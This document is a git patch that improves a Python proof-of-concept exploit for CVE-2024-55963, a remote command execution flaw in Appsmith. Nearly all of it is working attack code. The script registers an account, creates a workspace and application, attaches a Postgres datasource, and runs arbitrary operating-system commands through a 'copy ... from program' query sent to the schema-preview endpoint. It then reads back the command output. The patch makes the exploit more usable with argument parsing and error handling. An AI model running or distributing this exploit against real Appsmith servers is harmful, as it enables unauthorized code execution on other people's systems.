From 3aee300f9e9265decde711db7922686db043a170 Mon Sep 17 00:00:00 2001 From: Nishanth Anand Date: Thu, 3 Apr 2025 10:48:42 +0530 Subject: [PATCH] Updating PoC.py for AppSmith RCE This PR enhances the proof of concept exploit for CVE-2024-55963 with several key improvements: - Added proper argument parsing with argparse for better usability - Implemented robust error handling with HTTP status validation - Fixed syntax errors and improved code structure - Added URL validation and automatic http:// prefix - Enhanced error messaging and output formatting - Fixed authentication flow and request sequence --- CVE-2024-55963/poc.py | 342 +++++++++++++++++++++--------------------- 1 file changed, 171 insertions(+), 171 deletions(-) diff --git a/CVE-2024-55963/poc.py b/CVE-2024-55963/poc.py index 87d9d64..e58c610 100644 --- a/CVE-2024-55963/poc.py +++ b/CVE-2024-55963/poc.py @@ -1,23 +1,24 @@ import requests import json -import sys -import time import pyfiglet +import argparse # Create a banner using pyfiglet banner = pyfiglet.figlet_format("Appsmith RCE") # Replace with your desired title print(banner) -# Ensure the correct number of command-line arguments -if len(sys.argv) < 3: - print("Usage: python3 poc.py <url> <command>") - sys.exit(1) - -# Get the base URL and command from the command line arguments -base_url = sys.argv[1] -command_arg = sys.argv[2] +# Set up argument parser +parser = argparse.ArgumentParser(description='Appsmith RCE Proof of Concept') +parser.add_argument('-u', '--url', required=True, help='Base URL of the target') +parser.add_argument('command', nargs='?', default='id', help='Command to execute') +args = parser.parse_args() +# Get the base URL and command from the parsed arguments +base_url = args.url +command_arg = args.command +if not base_url.startswith("http://") and not base_url.startswith("https://"): + base_url = "http://" + base_url # Signup request signup_url = f"{base_url}/api/v1/users" @@ -25,8 +26,9 @@ "email": "poc1@poc.com", "password": "Testing123!" 
} -print ('Signing up...') +print('Signing up...') signup_response = requests.post(signup_url, data=signup_data) +signup_response.raise_for_status() # Login request login_url = f"{base_url}/api/v1/login" # Adjust the URL as needed @@ -48,8 +50,9 @@ } # Make the login request without following redirects -print ('Logging in...') +print('Logging in...') login_response = requests.post(login_url, headers=login_headers, data=login_data, allow_redirects=False) +login_response.raise_for_status() # Capture the 'Set-Cookie' header if it exists set_cookie = login_response.headers.get('Set-Cookie') @@ -58,9 +61,9 @@ cookie_name, cookie_value = set_cookie.split(';')[0].split('=') # Fourth request to create a new workspace -print ('Creating a new workspace...') +print('Creating a new workspace...') if set_cookie: - fourth_request_url = f"{base_url}/api/v1/workspaces" # Replace with your actual URL + fourth_request_url = f"{base_url}/api/v1/workspaces" fourth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", @@ -73,18 +76,19 @@ "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie } - fourth_request_data = json.dumps({"name": "Untitled workspace 3"}) # JSON data for the new workspace + fourth_request_data = json.dumps({"name": "Untitled workspace 3"}) fourth_response = requests.post(fourth_request_url, headers=fourth_request_headers, data=fourth_request_data) + fourth_response.raise_for_status() # Extract the 'id' from the response if it exists try: - response_json = fourth_response.json() # Attempt to parse the response as JSON - workspace_id = response_json.get("data", {}).get("id") # Get the 'id' from the 'data' field + response_json = fourth_response.json() + workspace_id = response_json.get("data", {}).get("id") except ValueError: print("Response content is not valid JSON:", fourth_response.text) # Print the raw response for debugging 
if workspace_id: - fifth_request_url = f"{base_url}/api/v1/applications" # Create a new application + fifth_request_url = f"{base_url}/api/v1/applications" fifth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", @@ -101,44 +105,44 @@ fifth_request_data = json.dumps({"workspaceId":workspace_id,"name":"Untitled application 2","color":"#E3DEFF","icon":"chinese-remnibi","positioningType":"FIXED","showNavbar":None}) - print ('Creating a new application...') + print('Creating a new application...') fifth_response = requests.post(fifth_request_url, headers=fifth_request_headers, data=fifth_request_data) + fifth_response.raise_for_status() try: - response_json = fifth_response.json() # Attempt to parse the response as JSON - application_id = response_json.get("data", {}).get("id") # Get the 'id' from the 'data' field + response_json = fifth_response.json() + application_id = response_json.get("data", {}).get("id") except ValueError: print("Response content is not valid JSON:", fifth_response.text) # Sixth request to get workspace details - if workspace_id: # Ensure workspace_id is available - sixth_request_url = f"{base_url}/api/v1/workspaces/{workspace_id}" # Use the new workspace ID + if workspace_id: + sixth_request_url = f"{base_url}/api/v1/workspaces/{workspace_id}" sixth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "application/json, text/plain, */*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", - "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", # Use your actual anonymous user ID + "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit", - "Cookie": f"{cookie_name}={cookie_value}", # Use the captured 
session cookie + "Cookie": f"{cookie_name}={cookie_value}", } print('Getting workspace details...') sixth_response = requests.get(sixth_request_url, headers=sixth_request_headers) + sixth_response.raise_for_status() # Extract all plugin IDs from the response try: - response_json = sixth_response.json() # Attempt to parse the response as JSON + response_json = sixth_response.json() plugin_ids = [plugin.get("pluginId") for plugin in response_json.get("data", {}).get("plugins", [])] - - # Loop through each plugin ID for the seventh request print(f'Searching for vulnerable postgres database...') for plugin_id in plugin_ids: # Seventh request to get the form data for the plugin - seventh_request_url = f"{base_url}/api/v1/plugins/{plugin_id}/form" # Adjust the URL as needed + seventh_request_url = f"{base_url}/api/v1/plugins/{plugin_id}/form" seventh_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "application/json, text/plain, */*", @@ -150,56 +154,64 @@ "Cookie": f"{cookie_name}={cookie_value}", } - - seventh_response = requests.get(seventh_request_url, headers=seventh_request_headers) - - # Extracting the port value from the seventh response try: - seventh_response_json = seventh_response.json() # Attempt to parse the response as JSON - # Check if 'data' and 'form' exist in the response - if 'data' in seventh_response_json and 'form' in seventh_response_json['data']: - form_data = seventh_response_json['data']['form'] - # Check for the presence of "postgres" in the response - if any("postgres" in str(item) for item in form_data): - print(f"Vulnerable postgres database found.") - break # Exit the loop if found - else: - pass # Fail silently - except (ValueError, IndexError) as e: - pass # Fail silently + seventh_response = requests.get(seventh_request_url, headers=seventh_request_headers) + seventh_response.raise_for_status() + + # Extracting the port value from the seventh response + 
try: + seventh_response_json = seventh_response.json() + if 'data' in seventh_response_json and 'form' in seventh_response_json['data']: + form_data = seventh_response_json['data']['form'] + if any("postgres" in str(item) for item in form_data): + print(f"Vulnerable postgres database found.") + break + else: + pass + except (ValueError, IndexError) as e: + pass + except requests.exceptions.HTTPError as e: + print(f"Error checking plugin {plugin_id}: {e}") + continue # Proceed to request 8 after finding "postgres" if "postgres" in str(seventh_response_json): - eighth_request_url = f"{base_url}/api/v1/environments/workspaces/{workspace_id}?fetchDatasourceMeta=true" # Use the workspace_id - eighth_request_headers = { - "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", - "Accept": "application/json, text/plain, */*", - "Accept-Language": "en-US,en;q=0.5", - "Accept-Encoding": "gzip, deflate", - "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", # Use your actual anonymous user ID - "Connection": "keep-alive", - "Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit", - "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie - } - - print('Getting the workspace details...') - eighth_response = requests.get(eighth_request_url, headers=eighth_request_headers) - - # Extracting the workspace ID from the eighth response try: - eighth_response_json = eighth_response.json() # Attempt to parse the response as JSON - workspace_data = eighth_response_json.get("data", [{}])[0] # Get the first item in the data list - workspace_id_value = workspace_data.get("id") # Extract the 'id' from the workspace data - except (ValueError, IndexError): - print("Response content is not valid JSON or does not contain the expected structure:", eighth_response.text) # Print the raw response for debugging - + # Try the environments API endpoint + eighth_request_url = 
f"{base_url}/api/v1/environments/workspaces/{workspace_id}?fetchDatasourceMeta=true" + eighth_request_headers = { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", + "Accept": "application/json, text/plain, */*", + "Accept-Language": "en-US,en;q=0.5", + "Accept-Encoding": "gzip, deflate", + "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", + "Connection": "keep-alive", + "Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit", + "Cookie": f"{cookie_name}={cookie_value}", + } + + print('Getting the workspace details...') + eighth_response = requests.get(eighth_request_url, headers=eighth_request_headers) + eighth_response.raise_for_status() + + # Extracting the workspace ID from the eighth response + try: + eighth_response_json = eighth_response.json() + workspace_data = eighth_response_json.get("data", [{}])[0] + workspace_id_value = workspace_data.get("id") + except (ValueError, IndexError): + print("Response content is not valid JSON or does not contain the expected structure:", eighth_response.text) + except requests.exceptions.HTTPError as e: + # If the environments API fails, use the workspace ID we already have + print(f"Could not fetch environment details: {e}") + print("Using existing workspace ID for datasource creation...") + workspace_id_value = workspace_id except (ValueError, IndexError): - print("Response content is not valid JSON or does not contain enough plugins:", sixth_response.text) # Print the raw response for debugging - + print("Response content is not valid JSON or does not contain enough plugins:", sixth_response.text) # After the eighth request to get workspace details - if workspace_id_value: # Ensure workspace_id_value is available - ninth_request_url = f"{base_url}/api/v1/datasources" # URL for creating a new datasource + if workspace_id_value: + ninth_request_url = f"{base_url}/api/v1/datasources" ninth_request_headers = { "User-Agent": 
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0", "Accept": "application/json, text/plain, */*", @@ -207,18 +219,17 @@ "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", - "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", # Use your actual anonymous user ID + "x-anonymous-user-id": "8e91142e-ea5a-4725-91b6-439e8bd0abc1", "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-2/page1-67294f8c2f2a476b7cdc6e20/edit/datasource/temp-id-0?from=datasources&pluginId=671a669f4e7fe242d9885195", - "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie + "Cookie": f"{cookie_name}={cookie_value}", } - # Request body for creating a new datasource ninth_request_data = { "pluginId": plugin_id, "datasourceStorages": { - workspace_id_value: { # Use the extracted workspace ID value + workspace_id_value: { "datasourceConfiguration": { "properties": [None, {"key": "Connection method", "value": "STANDARD"}], "connection": { @@ -234,29 +245,29 @@ } }, "datasourceId": "", - "environmentId": workspace_id_value, # Same as the extracted workspace ID value + "environmentId": workspace_id_value, "isConfigured": True } }, "name": "Untitled datasource 1", - "workspaceId": workspace_id # Same as the extracted workspace ID value + "workspaceId": workspace_id } - # Make the POST request to create the datasource - print ('Connecting to vulnerable postgres database...') + print('Connecting to vulnerable postgres database...') ninth_response = requests.post(ninth_request_url, headers=ninth_request_headers, json=ninth_request_data) + ninth_response.raise_for_status() # Extracting the ID from the response try: - ninth_response_json = ninth_response.json() # Attempt to parse the response as JSON - datasource_id = ninth_response_json.get("data", {}).get("id") # Extract the 'id' from the response + ninth_response_json = ninth_response.json() + 
datasource_id = ninth_response_json.get("data", {}).get("id") except (ValueError, KeyError): - print("Response content is not valid JSON or does not contain the expected structure:", ninth_response.text) # Print the raw response for debugging + print("Response content is not valid JSON or does not contain the expected structure:", ninth_response.text) # After the ninth request to create the datasource - if datasource_id: # Ensure datasource_id is available + if datasource_id: # 10th Request - tenth_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id + tenth_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" tenth_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", @@ -264,27 +275,25 @@ "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", - "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID + "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", - "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie + "Cookie": f"{cookie_name}={cookie_value}", } - # Request body for schema preview tenth_request_data = { "title": "SELECT", "body": "create table poc (column1 TEXT);", "suggested": True } - # Print statement before the 10th request print("Creating the table 'poc'...") - # Make the POST request to preview the schema for the 10th request tenth_response = requests.post(tenth_request_url, headers=tenth_request_headers, json=tenth_request_data) + tenth_response.raise_for_status() # 11th Request - eleventh_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use 
 the datasource_id + eleventh_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" eleventh_request_headers = { "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", "Accept": "application/json, text/plain, */*", @@ -292,100 +301,91 @@ "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json", "X-Requested-By": "Appsmith", - "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID + "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", "Origin": base_url, "Connection": "keep-alive", "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", - "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie + "Cookie": f"{cookie_name}={cookie_value}", } - # Request body for the 11th schema preview eleventh_request_data = { "title": "SELECT", - "body": f"copy poc from program '{command_arg}';", # Use the command argument + "body": f"copy poc from program '{command_arg}';", "suggested": True - } + } - # Print statement before the 11th request print("Running command...") - # Make the POST request for the 11th schema preview - eleventh_response = requests.post(eleventh_request_url, headers=eleventh_request_headers, json=eleventh_request_data) - - # 12th Request - twelfth_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id - twelfth_request_headers = { - "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", - "Accept": "application/json, text/plain, */*", - "Accept-Language": "en-US,en;q=0.5", - "Accept-Encoding": "gzip, deflate", - "Content-Type": "application/json", - "X-Requested-By": "Appsmith", - "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID - "Origin": 
base_url, - "Connection": "keep-alive", - "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", - "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie - } - - # Request body for the 12th schema preview - twelfth_request_data = { - "title": "SELECT", - "body": "select * from poc;", - "suggested": True - } +eleventh_response = requests.post(eleventh_request_url, headers=eleventh_request_headers, json=eleventh_request_data) +eleventh_response.raise_for_status() + +# 12th Request +twelfth_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id +twelfth_request_headers = { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", + "Accept": "application/json, text/plain, */*", + "Accept-Language": "en-US,en;q=0.5", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "application/json", + "X-Requested-By": "Appsmith", + "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID + "Origin": base_url, + "Connection": "keep-alive", + "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", + "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie +} - # Print statement before the 12th request - print("Reading command output from poc table...\n") - - # Make the POST request for the 12th schema preview - twelfth_response = requests.post(twelfth_request_url, headers=twelfth_request_headers, json=twelfth_request_data) +# Request body for the 12th schema preview +twelfth_request_data = { + "title": "SELECT", + "body": "select * from poc;", + "suggested": True +} - # Extracting and printing the response from the 12th schema preview - try: - twelfth_response_json = twelfth_response.json() - - # Extracting the specific data - body_data = 
twelfth_response_json.get("data", {}).get("body", []) - column1_values = [item.get("column1") for item in body_data] # Extract only the column1 values - print("Command output:") - print("----------------------------------------") - for value in column1_values: - - print(value) # Print each column1 value - print("----------------------------------------\n") +# Print statement before the 12th request +print("Reading command output from poc table...\n") - except (ValueError, KeyError): - print("Response content is not valid JSON or does not contain the expected structure:", twelfth_response.text) # Print the raw response for debugging - - # After the 12th request to preview the schema - if datasource_id: # Ensure datasource_id is available - # Cleanup Request - cleanup_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id - cleanup_request_headers = { - "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", - "Accept": "application/json, text/plain, */*", - "Accept-Language": "en-US,en;q=0.5", - "Accept-Encoding": "gzip, deflate", - "Content-Type": "application/json", - "X-Requested-By": "Appsmith", - "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID - "Origin": base_url, - "Connection": "keep-alive", - "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", - "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie - } - - # Request body for cleanup - cleanup_request_data = { - "title": "SELECT", - "body": "DROP TABLE poc;", # Command to drop the table - "suggested": True - } +# Make the POST request for the 12th schema preview +twelfth_response = requests.post(twelfth_request_url, headers=twelfth_request_headers, json=twelfth_request_data) - # Make the POST request for the cleanup - print ('\nDropping the table...') - cleanup_response = 
requests.post(cleanup_request_url, headers=cleanup_request_headers, json=cleanup_request_data) +# Extracting and printing the response from the 12th schema preview +try: + twelfth_response_json = twelfth_response.json() + + # Extracting the specific data + body_data = twelfth_response_json.get("data", {}).get("body", []) + column1_values = [item.get("column1") for item in body_data] # Extract only the column1 values + print("Command output:") + print("----------------------------------------") + for value in column1_values: + print(value) # Print each column1 value + print("----------------------------------------\n") + +except (ValueError, KeyError): + print("Response content is not valid JSON or does not contain the expected structure:", twelfth_response.text) # Print the raw response for debugging + +# Cleanup Request +cleanup_request_url = f"{base_url}/api/v1/datasources/{datasource_id}/schema-preview" # Use the datasource_id +cleanup_request_headers = { + "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:131.0) Gecko/20100101 Firefox/131.0", + "Accept": "application/json, text/plain, */*", + "Accept-Language": "en-US,en;q=0.5", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "application/json", + "X-Requested-By": "Appsmith", + "x-anonymous-user-id": "017a0261-6296-4852-88a1-d557bd478fb2", # Use your actual anonymous user ID + "Origin": base_url, + "Connection": "keep-alive", + "Referer": f"{base_url}/app/untitled-application-1/page1-670056b59e810d6d78f0f7dc/edit/datasource/67005e8f9e810d6d78f0f7e3", + "Cookie": f"{cookie_name}={cookie_value}", # Use the captured session cookie +} - # Assuming datasource_id is defined somewhere in your code - +# Request body for cleanup +cleanup_request_data = { + "title": "SELECT", + "body": "DROP TABLE poc;", # Command to drop the table + "suggested": True +} +# Make the POST request for the cleanup +print('\nDropping the table...') +cleanup_response = requests.post(cleanup_request_url, 
headers=cleanup_request_headers, json=cleanup_request_data)